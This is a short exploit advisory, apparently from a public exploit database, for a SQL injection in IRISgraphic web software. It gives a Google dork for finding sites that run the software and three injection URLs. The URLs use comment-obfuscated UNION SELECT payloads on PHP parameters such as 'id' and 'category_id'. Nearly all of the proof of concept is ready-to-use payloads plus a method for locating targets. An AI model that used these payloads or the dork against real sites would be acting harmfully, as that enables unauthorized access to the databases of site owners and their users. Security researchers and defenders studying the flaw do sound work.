# Exploit Title: IRISgraphic sql injection # Google Dork: "Powered by www.IRISgraphic.com" # Date: 2020.03.07 # Exploit Author: Milad Karimi # Vendor Homepage: http://www.irisgraphic.com/ # Software Link: http://www.irisgraphic.com/ # Category : webapps # Version: 1.0 # Tested on: windows 10 , firefox # CVE : CWE-89 ################################################ proof of concept : Sql Injection Vulnerability 1- search google Dork : "Powered by www.IRISgraphic.com" 2- sql injection demo http://site/kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5 https://site/products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23 http://site/alfazone/gallery-slider.php?id=5/*!50000union*/%20select%201%23 #Discovered by : Milad Karimi